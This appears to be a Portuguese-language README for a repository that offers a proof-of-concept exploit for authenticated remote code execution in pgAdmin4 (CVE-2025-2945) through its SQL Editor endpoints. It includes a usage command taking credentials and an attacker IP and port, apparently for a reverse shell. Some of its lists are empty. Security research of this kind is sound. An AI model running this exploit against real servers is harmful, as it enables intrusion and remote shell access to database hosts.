
Exploit de prova de conceito para execução remota de código autenticada no pgAdmin4 (CVE-2025-2945) por meio do abuso do SQL Editor. Projetado para testes de segurança autorizados e educação.
Este repositório contém um script de prova de conceito criado para pesquisa de segurança e testes de penetração autorizados envolvendo a vulnerabilidade CVE-2025-2945, que afeta determinadas versões do pgAdmin4.
O problema permite que um usuário pgAdmin autenticado com acesso ao Editor SQL acione a execução remota de código abusando do fluxo de inicialização do painel da Query Tool. Este PoC demonstra a vulnerabilidade apenas para fins educacionais, de auditoria e defensivos.
Esta ferramenta destina-se SOMENTE a:
NÃO use esta ferramenta em nenhum sistema sem permissão explícita. O uso não autorizado é ilegal e antiético. O autor não é responsável pelo uso indevido.
A vulnerabilidade decorre de falhas lógicas nos endpoints de inicialização do Editor SQL. Ao interagir com /sqleditor/initialize/ e /sqleditor/panel/, o aplicativo lida incorretamente com dados controlados pelo usuário, permitindo, em última análise, que payloads elaborados executem comandos arbitrários no backend.
O PoC explora a seguinte sequência de endpoints:
requestspython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(Um exemplo completo já é fornecido na seção de ajuda do script.)
poc.py → The exploit proof-of-concept
README.md → Project documentation
Os administradores devem:
Autor: UdayVeer